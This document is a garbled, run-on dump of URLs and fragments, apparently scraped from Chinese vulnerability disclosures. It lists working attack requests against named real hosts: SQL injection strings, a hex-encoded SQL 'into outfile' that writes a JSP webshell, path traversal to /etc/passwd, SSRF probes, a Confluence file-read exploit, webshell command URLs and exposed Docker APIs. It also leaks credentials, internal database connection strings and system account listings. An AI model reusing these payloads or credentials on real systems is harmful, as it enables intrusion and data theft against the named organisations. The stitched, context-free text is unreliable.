sbin:/***** wn:/sbin:/s***** sbin:/***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** bus:/:/***** owner:/d***** abrt:/sb***** daemon:/:/***** ntp:/sbi***** ck:/var/run/avahi-***** User:/var/lib***** User:/var/li***** SSH:/var/empty***** OProfile:/***** www:/***** http://**.**.**/12580.jsppwd=0324&i=ifconfig http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** http://cmbt.cn/QUQMe39Fg7a10sjM https://pbdw.ebank.cmbchina.com/cbmchart/servlet/H5Servlet?clientid=9Fg7a10sjM&prjNbr=72609 http://cmbt.cn/njVmvJ9FnBu10sNM https://pbdw.ebank.cmbchina.com/cbmchart/servlet/H5Servlet?clientid=9FnBu10sNM&prjNbr=72608 http://miaosha.shenzhenair.com http://miaosha.shenzhenair.com/%c0%ae/WEB-INF/web.xml http://www.ahai.com.cn/ https://zhaopin.wanda.cn/loginindex.do http://task.www.sogou.com/ http://120.24.218.210/admin1218.rar http://cloud.vpclub.cn/Login.aspx?returnUrl=http%3a%2f%2fcloud.vpclub.cn%2f https://aws.amazon.com/cn/elasticbeanstalk/ http://images.baidu.com/search/down?tn=download&ipn=dwnl&word=download&ie=utf8&fr=result&url=http://family.baidu.com/favicon.ico?.jpg http://list.image.baidu.com/n/similar?queryImageUrl=http://ssrf.*****.dnslog.info/&querySign=1217191529%2C1914405054&t=1448426252884&pn=210&rn=100&fr=pc http://list.image.baidu.com/pictureup/uploadshitu?rt=0&stt=0&filename=CasterPy&tn=shituresultpc&uptype=paste&rn=10&ftn=wantu&objurl=http://ssrf.*****.dnslog.info/&fm=index&ct=1 http://www.chinawutong.com/ashx/infomationAppraise.ashx http://**.**.**/bugs/wooyun-2016-0185504_ http://**.**.**/_ http://**.**.**/script_ http://beehiveweibo.zteict.com/ admin:111111 https://113.140.11.212:8080 http://**.**.**.**/si/portal/loginPortal.jsp http://**.**.**.**/server/spreq/attachment!download.action?attachFileId=801100014456&ticket=08D85582CDC51979AC0A30B72167655C&domain=si http://foundation.zte.com.cn/phpsso_server/caches/configs/database.php~ http://foundation.zte.com.cn/phpsso_server/caches/configs/system.php~ http://foundation.zte.com.cn/caches/configs/database.php~ http://foundation.zte.com.cn/caches/configs/system.php~ http://ie.sogou.com/ http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950 http://183.224.86.211:82/public/outLogin.action http://brandzone.youku.com/article/-1%22%20or%201=1%20and%20%221%22=%221 http://brandzone.youku.com/article/-1%22%20or%201=2%20and%20%221%22=%221 http://apps.ceair.com下载掌上东航APP http://www.xinnet.com/WEB-INF/classes/modules/spring.xml http://www.xinnet.com/WEB-INF/web.xml jdbc:mysql://172.20.16.200:3306/info_pub jdbc:oracle:thin:@172.20.20.231:1521:xinnetdb jdbc:oracle:thin:@172.20.21.2:1521:xinnet2 http://mall.1hai.cn/admin/default.html http://crashreport.yy.duowan.com/crashreport/dev_version.php?pkey= https://github.com/liuhaiween/devopsjumpserver/blob/ccb9acb139d83fc80aaf6ef4e5082bbb3690839f/jumpserver/settings.py encap:Ethernet addr:43.230.89.253 Bcast:43.230.89.255 Mask:255.255.255.192 fe0e:8f6c/64 Scope:Link MTU:1500 packets:1456692317 packets:1488521521 txqueuelen:1000 http://lms.midea.com/module-portalweb/portalweb/view/index.shtml https://lms.midea.com/module-portalweb/portalweb/components/tangram/combo/popwin/query.shtml?cfgKey=bankInformation https://lms.midea.com/module-portalweb/portalweb/view/supplier/EbSupplierEdit.shtml https://**.**.**.**/wenhaiwen/flaskr/blob/785c9338fe2ebcd37cd82c6a7ed320614dcdb7b9/hello.py http://us.ceair.com/muovc/newsitefront/order/order!viewOrderAfterPay.shtml?ordNo=16030571358 http://121.14.4.144:8080/ http://123.59.124.137/ http://123.59.124.138/ http://118.213.246.48:7001/ http://118.213.246.48:7001/bea_wls_internal/1.jsp jdbc:oracle:thin:@138.138.2.123:1521:ZXBS http://admin.i.house.sina.com.cn/index.php?mod=login http://manage.kefu.**.**.**.**:8002/mobileservice/doLogin.html http://58.20.232.155:82/OpenPage/Login.aspx http://www.annto.com/DownView.Asp?ID=3 http://202.104.30.115:22222/msd_ad/phone/login.action http://**.**.**.**/ http://**.**.**.**/manager/login.php http://**.**.**.**/manager/contract/index.php http://**.**.**.**/manager/contract/contract_modify.php?id=311 http://**.**.**.**/wechat/WechatService_queryWechats.action http://**.**.**.**/admin/ http://**.**.**.**/web.rar http://116.236.239.109/chip/ResetPass.aspx http://admin.super.leju.com/ http://a6.gykghn.com:8080/yyoa/index.jsp http://oa.sinopharm-fj.com:8080/yyoa http://oa.gykgnmg.com/yyoa http://a6.gykghn.com:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex%28%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27%29%20%20into%20outfile%20%27D:/UFseeyon/OA/tomcat/webapps/yyoa/sky123.jsp%27 http://**.**.**.**/webSite/Search.aspx?k=123 http://116.236.239.109/index.aspx http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0 http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1%27%20union%20select%201111111111111,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20--%20-&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0 http://lexue.yonyou.com http://218.76.215.23:8082/gzcx/ http://**.**.**.**/portal/index.jsp http://**.**.**.**/project/list.do?action=queryById&fage=2&id=1%27 https://**.**.**.**/demo.htm http://admin.weixin.leju.com/?site=web&ctl=login&act=index http://**.**.**.**/content/27104 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399 http://**.**.**.** https://**.**.**.**//spaces/viewdefaultdecorator.action?decoratorName=file:///home/confluence/.bash_history http://123.57.44.206:8989/isc_sso/login http://123.57.44.206:8001/bea_wls_internal/1.jsp jdbc:oracle:thin:@123.57.44.206:1521:sogrid http://120.24.220.113/ http://120.24.220.113/bea_wls_internal/2.jsp http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com http://3pl.yihaodian.com/system/login_login.action?redirect:http://10.187.10.218 https://github.com/jackyliusohu/msohucmdb/blob/4b624e2b3068ec08e72c08d55a08f6ac15ef6cbb/msohucmdb/settings.py https://github.com/lizhengdong/TestAppInstance/blob/cf8fddb1a7f18f730394947b4dd58fd4491c3b11/TestAppInstanceJar/mailInfo.properties baodou.baofeng.com/welcome/doexchange/ http://180.76.183.98/ http://180.76.183.131 http://116.236.229.44:8001/ http://**.**.** http://116.236.229.44:8001/bea_wls_internal/2.jsp jdbc:oracle:thin:@192.168.2.99:1521:CRMREP1 http://android.myapp.com/myapp/detail.htm?apkName=cn.yupaopao.crop cn.yupaopao.crop/shared_prefs/logininfo_preferences.xml http://**.**.**.**//hwx/wxrp.aspx?tp=Health_relative_report.aspx&studyid=${客户体检编号}&Tc=130001 http://mobojoy.baidu.com/dev/ http://mobojoy.baidu.com/dev/?r=Member/forgetPasswordReset/email/我是邮箱马赛克/token/4573357947746199b72b9a1663176bad http://mobojoy.baidu.com/affiliate/?r=Member/forgetPasswordReset/email/我是邮箱马赛克/token/d6fa5adea5c42c29e64cef32442cdaa0 http://open.weibo.com/wiki/Weibo-JS_V2#JS_widget.E8.AF.B4.E6.98.8E.E5.8F.8A.E7.A4.BA.E4.BE.8B http://tjs.sjs.sinajs.cn/open/api/js/wb.js?appkey=YOUR%20APPKEY&debug=true https://api.weibo.com/oauth2/authorize?client_id=3063806388 http://weibo.com http://zzgq.hnair.com/frontend/ticketChange/ticketChange_toTicketChange.action http://zzgq.hnair.com/tang/passwd http://zzgq.hnair.com/tang/hosts http://zzgq.hnair.com/tang/group root:x:0 bin:x:1:bin,daemon daemon:x:2:bin,daemon sys:x:3:bin,adm adm:x:4:adm,daemon tty:x:5 disk:x:6 lp:x:7:daemon mem:x:8 kmem:x:9 wheel:x:10 mail:x:12:mail,postfix uucp:x:14 man:x:15 games:x:20 gopher:x:30 video:x:39 dip:x:40 ftp:x:50 lock:x:54 audio:x:63 nobody:x:99 users:x:100 floppy:x:19 vcsa:x:69 utmp:x:22 utempter:x:35 cdrom:x:11 tape:x:33 dialout:x:18 saslauth:x:76 postdrop:x:90 postfix:x:89 fuse:x:499 sshd:x:74 jd:x:501 pn:x:502 gs:x:504 resc:x:505 dt:x:506 ntp:x:38 rpc:x:32 rpcuser:x:29 nfsnobody:x:65534 nagios:x:507 logsee:x:508 sysadm:x:800 usr01:x:801 tcpdump:x:72 nscd:x:28 ldap:x:55 td-agent:x:498 gsbak:x:3002 pnbak:x:3003 apollo:x:3005 mobser:x:3006 ota:x:3007 memcached:x:497 y8:x:3008 hadoop:x:3009 www.mosh.cn http://**.**.**.**/webBuyAction.do;jsessionid=CCC49BF21E4CFF1E399687470B91E04E?action=topSearch http://www.bftv.com/ http://wap.g.baofeng.com http://wap.g.baofeng.com/Index/gethotgame?platform=1 http://cafe.baidu.com/ http://cafe.baidu.com/ajax/users/query?_=1462959192871×tamp=&limit=50&spaceId=1&q=@ http://cafe.baidu.com//issue/history/detail/1 http://**.**.**/weixin/khfwController.dogoIndex&openId=oMAmUjlbJIiy4fJ7xtZ2k9NgLL-I http://b2a.airkunming.com/module/hyfw/forget_passwordHr.jsp http://61.145.111.17:8001/bea_wls_diagnostics/jsp.jsp http://172.16.12.41:80 http://172.16.12.50:80 http://172.16.12.49:80 http://172.16.12.43:8081 http://172.16.12.52:8080 http://172.16.12.53:8080 http://172.16.12.59:8081 http://172.16.12.60:80 http://172.16.12.73:8080 http://172.16.12.74:8081 http://172.16.12.74:8080 http://172.16.12.78:80 http://172.16.12.79:80 http://172.16.12.83:8080 http://172.16.12.85:8088 http://172.16.12.88:8080 http://172.16.12.90:8088 http://172.16.12.59:8080 http://172.16.12.114:8080 http://172.16.12.115:8080 http://172.16.12.118:8088 http://172.16.12.129:80 http://**.**.**.**/cloudmail/ http://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://121.40.223.69:8028/.git/config http://www.xiaoshuxiong.com/ http://www.xiaoshuxiong.com/mobile/category.php?act=cat_goods&cat_id=1 ip.che168.com/ip.che168.com.zip https://www.hnagroup.net/prx/000/http/vpnweb.hnair.com/Default.aspx http://service.eking-tech.com/hnaAct/getBackPwd http://10.2.1.241/Frameset/login.html https://www.hnagroup.net/prx/000/http/vpnweb.hnair.com/Default.aspx获取验证码后,验证码在返回的包中了, http://zichan.damai.cn:88/ http://zichan.damai.cn:88/login.do http://zichan.damai.cn:88 http://bisbj.unibankmedia.com/login.aspx http://bisbj.unibankmedia.com/WebResource.axd?d=WCX_nB4YLXQ_q3tyr6GjWMG6nOw2fLPWD_z9RtbqqpQ1&t=633750802290014532 http://corp.56.com/extman/cgi/index.cgi http://beebox-admin.183gz.com.cn/ http://**.**.**.**/bugs/wooyun-2010-086444),经过修复,虽然已有的漏修复了,但还存在其他问题。 http://**.**.**.**/的问题已经修复,但是该机器的8080端口也可以对外访问到,访问地址为http://**.**.**.**:8080/,网站框架为JBOSS框架,存在命令执行漏洞,且为管理员权限。 administrator:Zjlib2056,用该密码对其他机器进行测试时,又发现其他11台机器使用相同的密码,如下所示: http://**.**.**.**/home/zy_home.jsp) http://**.**.**.**/home/zy_home.jsp)这个网站上共发现多个内网机器的真实IP内网地址,如下: http://bdpp.leju.com/manage.php?a=login http://api.yichemall.com/carsource/ycapi/getecpricenew?callback=jQuery1112010467815725132823_1462273401473&carId=116848&cityName=北京&_=1462273401474 http://**.**.**.**/bugs/wooyun-2015-0142711 http://content.2500city.com/ucenter/user/login AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 http://www.11185gz.com.cn的邮政票务上注册一个帐号 http://**.**.**.**/defaultroot/UploadServlet http://**.**.**.**/defaultroot/upload/test/123458/123458.jspx?cmd=netstat http://content.2500city.com/Json?relatedOrder=7&platform http://content.2500city.com/Json?platform=2&deviceId=864 http://ume3.umetrip.com/razor-master/cobub/index.php?/ums/postClientData http://202.98.157.30/LoginOn.aspx http://data.auto.sina.com.cn/car/api/car_detail/car_api_new.php?callback=jQuery17208639282449148595_1463050806467&carid=25180,23528,21542&_=1463050806866 http://download.android.bizhi.sogou.com/client.php AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 AS:2048 http://**.**.**.**:7001/uddiexplorer/ss.jsp jdbc:oracle:thin:@//**.**.**.**:1521/xszs http://101.227.240.109:8989/baf/jsp/uiframe/login.jsp http://check.biz.icms.ifeng.com/admin/?_a=1 http://api.app.zeze.com/3.0.8/index.php?a=index&area=%E5%9C%A8%E5%8D%8E%E5%8D%97%E7%90%86%E5%B7%A5%E5%A4%A7%E5%AD%A6%E5%8C%97%E5%8C%BA%E9%99%84%E8%BF%91&authcode=MzQ0N2ZiMTljYzc2ZDY5NzQyZTdlOWRiYTA1NTcxMzZhMjA3Y2NlMDRhMDVkOGQ0&brand=QiKU&c=my&city=%E5%B9%BF%E5%B7%9E%E5%B8%82&cpu=mt6753&density=480&deviceid=867556021834224&district=%E5%A4%A9%E6%B2%B3%E5%8C%BA&locale=cn&location=23.168901%2C113.346539&model=8681-A01&page=1&pagesize=15&qikeversion=3.0.8&showuid=2351679&sign=5901506e1fc7424cc6164f98e75bab56&source=qike&street=%E4%B8%9C%E8%8E%9E%E5%BA%84%E8%B7%AF&sysversion=22&uid=4032877&versionCode=308 http://www.epicc.com.cn/ecargo/ http://admin.pay.sina.com/phpmyadmin/ http://pic4.semir.com/index.aspx http://pic4.semir.com/show.aspx?filepath=1&type=1 index.php/Contacts/add http://social.all-wifi.cn http://**.**.**.**/ http://**.**.**.**:8081/cloudadmin_new/goLogin/proxyUser.action http://61.164.160.11/plugins/weathermap/configs/test.php http://training.fang.com/ http://**.**.**.**/news.php?contentid=2369 http://**.**.**.**/news.php?contentid=2436 http://**.**.**.**/news.php?contentid=2370 http://**.**.**.**/news.php?contentid=2243 admin.php/Index/index.html http://**.**.**.**/ http://**.**.**.** http://**.**.**.**:8008/ http://**.**.**.**/是中国移动的NGCA运维管理平台 https://www.zhihu.com/people/flowerains ff40306600c4871484ba18475bcd6b68:7a0445 http://**.**.**.**/ http://222.66.163.130/ http://222.66.163.130:8001/bea_wls_internal/test.jsp jdbc:oracle:thin:@172.18.2.10:1521/HRDB http://**.**.**.**/bugs/wooyun-2010-0206169 http://**.**.**.**/bugs/wooyun-2010-0204620 jdbc:oracle:thin:@**.**.**.**:1521:bims pass:123456 http://220.181.26.165/jenkins/ http://220.181.26.165/jenkins/job/video_audit_info/ws/pom.xml/*view*/ http://220.181.26.165/jenkins/job/GoLang-56-synchronize-vrs/ws/pom.xml/*view*/ http://220.181.26.165/jenkins/job/admin_tv_cleanCache/ws/clean_admin_cache.iml/*view*/ http://220.181.26.165/jenkins/job/admin_tv_cleanCache/ws/pom.xml http://220.181.26.165/jenkins/job/admin_tv/ws/crossdomain.xml http://zone.wooyun.org/content/27104 http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName= http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName=../../ http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName=file:///opt/atlassian/data http://**.**.**.**/themes/mskin/login/login.jsp http://**.**.**.**/components/fck/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://g.19e.cn/login/index.jsp www.treebear.cn http://www.treebear.cn http://61.151.246.245/ http://119.29.155.184:88/product/ http://biz.meichai.in http://member.fangchan.com/users/create http://weixin.ltchina.com/show/iamstar http://www.kugou.com/kf/kf/app/upload.php http://www.kugou.com/kf/kf/app/upload.php http://www.kugou.com/kf/kf/app/upload/1463241818.php http://zp.hongta.com/HRWEB/hr/recruitInfoParentAction/getNotices http://fankui.help.sogou.com/index.php/web/web/index?type=6 index.php/web/web/addShenSu http://fankui.help.sogou.com http://misc.intra.leju.com/mantis/view.php?id=81920 https://svn.intra.leju.com/leju/data.leju.com http://wooyun.org/bugs/wooyun-2016-0205007 www.kongzhong.com https://safe.spriteapp.com/ guowei:123456 http://**.**.**.**/cgi-bin/main/About https://**.**.**.**/ http://pages.tom.com/make/manage.php http://pages.tom.com/make/manage.php http://180.96.17.120:8000 http://**.**.**/bea_wls_internal/2.jsp jdbc:mysql://127.0.0.1:3306/cev5500?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://m.hongta.com/ http://m.hongta.com/shell/shel.jsp jdbc:oracle:thin:@**.**.**.**:1521:shxt jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcltt jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@localhost:1521:orcltt url:http://mail.transfar.com/ http://mail.transfar.com/tmw/7/mailmain?type=pm http://123.126.48.10:80/memadmin/index.php http://**.**.**.**/bugs/wooyun-2010-0184488 http://**.**.**.** http://**.**.**.**/fwzx/wooyun.jsp http://**.**.**.**/login.jhtml https://**.**.**.**/grootzhao/groot/blob/c36a7f3ba2885c24a681b65c8bdf1c2c11f40749/base-web/src/main/resources/log4j.properties http://**.**.**.**/zxsale-sys2/login.action http://**.**.**.**/zxsale-sys2/bak.jsp http://**.**.**.**/zxsale-sys2/aa.jsp http://**.**.**.**/doLogin.do http://broker2.esf.leju.com/login?client_citycode=bj http://m.xib.com.cn/data_detail.php?id=4 http://m.xib.com.cn/data.php?m=1 ldap://**.**.** http://**.**.**/user/penghl/184_ http://**.**.**/CMS/LoginBlue.aspx_ https://**.**.**/user/requireLoginlang=en_US_ http://**.**.**.**/BaseInfo/UnitRecruitPlan.aspx?cyear=2015 http://pmo.pm.netease.com/ezfaq/show?id=redmine-system-builder&faq_id=43 http://dm.mail.163.com/anonymous/userList/scan?mailUserFile=/../../../../etc/passwd http://dm.mail.163.com/anonymous/userList/downloadOKList?tempFileName=/../../../../etc/passwd http://kwbbs.kuwo.cn/kwforum.tar http://**.**.**/ http://go.sogou.com/ http://go.sogou.com/ApiForWeather.php?city=%E5%8C%97%E4%BA%AC http://211.147.239.102:8089/ admin:admin http://www.weiba66.com:80/ http://builder.iguokr.com/#/signin http://**.**.** http://**.**.**/containers/json t.highpin.cn/m/c3Wec t.highpin.cn/m/c3Wec,就自动登录该账号 tcp://121.41.33.174:2375 com:5001/qtcontent/python-graphviz:0.1 python:3.5 sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin http://117.121.54.92:8015/etc/passwd http://117.121.54.92:8015/etc/shadow http://117.121.54.92:8015/root/.bash_history http://drops.wooyun.org/papers/1151 http://drops.wooyun.org/papers/1377 https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&contactEmail=123@163.com http://123.127.198.90/mslife_wx/managerLogin.jsp http://123.127.198.90/f/index.jsp http://ishangche.net/staff/toExamine http://ishangche.net/jsp/common/main.jsp?realName=%E9%AA%86%E9%A3%9E&&userName=luofei# http://ishangche.net/staff/toExamine http://**.**.**/ http://**.**.**/user/liuhy6/configure_ http://**.**.**/user/guohong/configure_ http://117.121.97.3:9080/view/dmp/job/dmp-console/ws/target/classes/application.properties/*view*/ classpath:insite ame:dmp_co***** Name:net.sf.l***** le:8085/monitor/mai***** phoenix:d***** http://180.76.161.55:2375 tcp://180.76.161.55:2375 registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91 encap:Ethernet df:68:95:78 addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0 dfff:fe68:9578/64 Scope:Link MTU:1500 packets:933462 packets:889024 http://**.**.**.**/regUserAction.action cyq:123456 fmq:123456 gxy:123456 hds:123456 ltq:123456 nwc:123456 pss:123456 wsj:123456 yjx:123456 http://e.s.weibo.com/sa/public/index.php/blogpro/index?uid=5&mid=3974282985712490 http://help.qijiapay.com http://139.196.36.217/.svn/entries http://pt.ztgame.com/ view-source:http://athena.brand.sogou.com/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/issue weblogic:weblogic http://oa.tianya.cn/services/MobileService?wsdl SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="webservices.services.weaver.com.cn xmlns:urn2="http://workflow.webservices.mobile.weaver SOAP-ENV:Header/ SOAP-ENV:Body urn:checkUserLogin urn:in0 urn:in0 urn:in1 urn:in1 urn:in2 urn:in2 urn:checkUserLogin SOAP-ENV:Body SOAP-ENV:Envelope https://github.com/mlml1020/TestProject/ https://github.com/mlml1020/TestProject/blob/dcd8cccb7e61c73e0ca837c7c85a9fa3f28bee75/project2/resources/system-config.properties jdbc:oracle:thin:@10.4.207.6:1521:ora www.mianshui365.com/m.mianshui365.com http://m.mianshui365.com/index.php?_a=charter&_c=active&partner_id=51&pid=706&step=2 http://opr.meihua.info/ com:42.96.192.25 http://42.96.192.25:3133/?activityid=1 http://115.159.119.88:2375 ip-172-31-43-63:/home/ubuntu# tcp://115.159.119.88:2375 com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/acc_cloud:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server_20160420:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server_20160420:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server_20160420:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/acc_cloud:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest http://m.rrs.com/ http://202.96.57.47/ http://202.96.57.47/ca/ma3.jsp http://**.**.**.**/link?url=-NwVhyRtnGJuOrwx53DHpTzdhcfl0XWcG8Yn8hjTw4e7cZKBfVZW0mhPgp4Xw9YWfJx2ZnPMUYwR4dVS7wBwa3r-jTpZh8sG5ljf_AKE7Ee ftp://**.**.**.** https://**.**.**.**/ryansecret/reprostservice/blob/83d246d34d8e2b0d6e3c124ef99976bef341dbcd/UpLoadLogFile/App.config http://**.**.**/023/index.jspx https://github.com/piaoxj/bankchannel/blob/efaebdebddbbb5f2be340a9852619cd9ea8a7ebf/pay-channel-access/src/main/profiles/dev/config/jdbc.properties jdbc:mysql://115.28.14.202:3306/pay_channel2?useUnicode=true&characterEncoding=UTF-8 http://www.sogou.com/reventondc/transform?charset=GBK&key=%E8%B0%A2%E6%96%87%E4%B8%9C1&objid=2000000&type=2&userarea=sss&vrid=70043804&url=http://10.13.199.124.xip.io:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd%23 http://www.sogou.com/reventondc/transform?charset=GBK&key=%E8%B0%A2%E6%96%87%E4%B8%9C1&objid=2000000&type=2&userarea=sss&vrid=70043804&url=http://168675196:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd%23 http://www.sogou.com/reventondc/transform?charset=GBK&key=%E8%B0%A2%E6%96%87%E4%B8%9C1&objid=2000000&type=2&userarea=sss&vrid=70043804&url=http://www.sogou-inc.com http://opendata.readnovel.com/web/user.php?a=update_user http://123.125.105.158:2375/version http://123.125.105.159:2375/version http://210.38.57.21/gyxszz/xxsh/news.php?id=220 http://miyu.apps.ibaihe.com/talk/mylist?appName=meet&latitude=40.001696&limit=10&channel=android%7C%7CAndroid_5.1%7C%7C028_miyu_android_test%7C%7C8681-A01%7C%7CQiKU&page=1&userid=523618&version=3.6.0&longitude=116.486212 http://210.38.57.94/news/news.php?id=6625 www.treebear.cn http://www.treebear.cn/common/image/upload.htm www.treebear.cn ie.sogou.com/designguidelines/getimage.php?cate=uikit&index=/../../../../../../etc/passwd%00.jpg&type=2 ie.sogou.com/designguidelines/getimage.php?cate=uikit&index=/../../../designguidelines/getimage.php%00.jpg&type=2 URL:http://61.145.111.23/zh-CN/Account/Login发现1个弱口令: http://web.admin5.com/w/user/index.php?g=user&m=login&a=index https://114.251.242.150/etrading/.svn/entries jdbc:oracle:thin:@**.**.**.**:1523:hwcpmis1 http://nc.gtcloud.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute&TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=1 http://123.206.30.193:2375 tcp://123.206.30.193:2375 docker.baihe.com/nginx docker.baihe.com/php5 docker.baihe.com/php5.5 docker.baihe.com/php-fpm docker.baihe.com/baiheredis docker.baihe.com/mongo docker.baihe.com/php docker.baihe.com/mysql docker.baihe.com/baihemysql daocloud.io/nginx docker.baihe.com/baihenginx docker.baihe.com/nginx docker.baihe.com/centos docker.baihe.com/redis docker.baihe.com/redis docker.baihe.com/memcache daocloud.io/daocloud/daocloud-toolset docker.baihe.com/php-fpm docker.baihe.com/dockerui docker.baihe.com/centos7 http://58.56.128.89/security/loginInit.action http://hrois.haier.net/security/loginInit.action http://www.huochaihe.com/mba/pass/passTopic.php?action=fail&id=159202&reason_id=12&ispass=-2&user_id=919113&forward=%2Fmba%2Fpass%2FpassTopic.php%3Faction%3Dlist%26p%3D1%26ispass%3D-2 http://www.huochaihe.com/mba/pass/passTopic.php?action=fail&id=159202&reason_id=12&ispass=-2&user_id=919113&forward=%2Fmba%2Fpass%2FpassTopic.php%3Faction%3Dlist%26p%3D1%26ispass%3D-2 http://www.huochaihe.com/mba/comment/list.php?action=thread_comment_list&user_id=879081 https://**.**.**.**/home/index.do https://**.**.**.**/file.do?fileId=77291 http://27.223.70.11/ http://27.223.70.11/reg_success.asp http://union.elong.com/zh-CN/Account/Forgetpass foxmail.com/wooyun123,做了各种测试,洞洞真的存在的啊啊啊啊,这里就不重复放过程了 http://union.elong.com/zh-CN/register(谷歌出来的。。。) http://27.223.70.16:443/gems/security/loginInit.action http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US http://www.sogou.com/reventondc/transform?charset=GBK&key=2000&objid=2000000&type=2&url=http://cloud.sogou-op.org&userarea=sss&uuid=111&vrid=123 www.csrcbank.com http://www.csrcbank.com http://baike.baidu.com/link?url=FE1INkeOjK5QdIL5k2-CaFSOUAsMwOfLn6SvWswMXXs5PlkzW8LvX7vYRT6eYhnYrMlCZ5pdDZDQjGdp0_wjOK http://renren.haier.com/.git/config http://renren.haier.com/admin/default/login http://renren.haier.com:8080/phpmyadmin http://180.166.172.123/ http://180.166.172.123:7001/ http://**.**.**.** 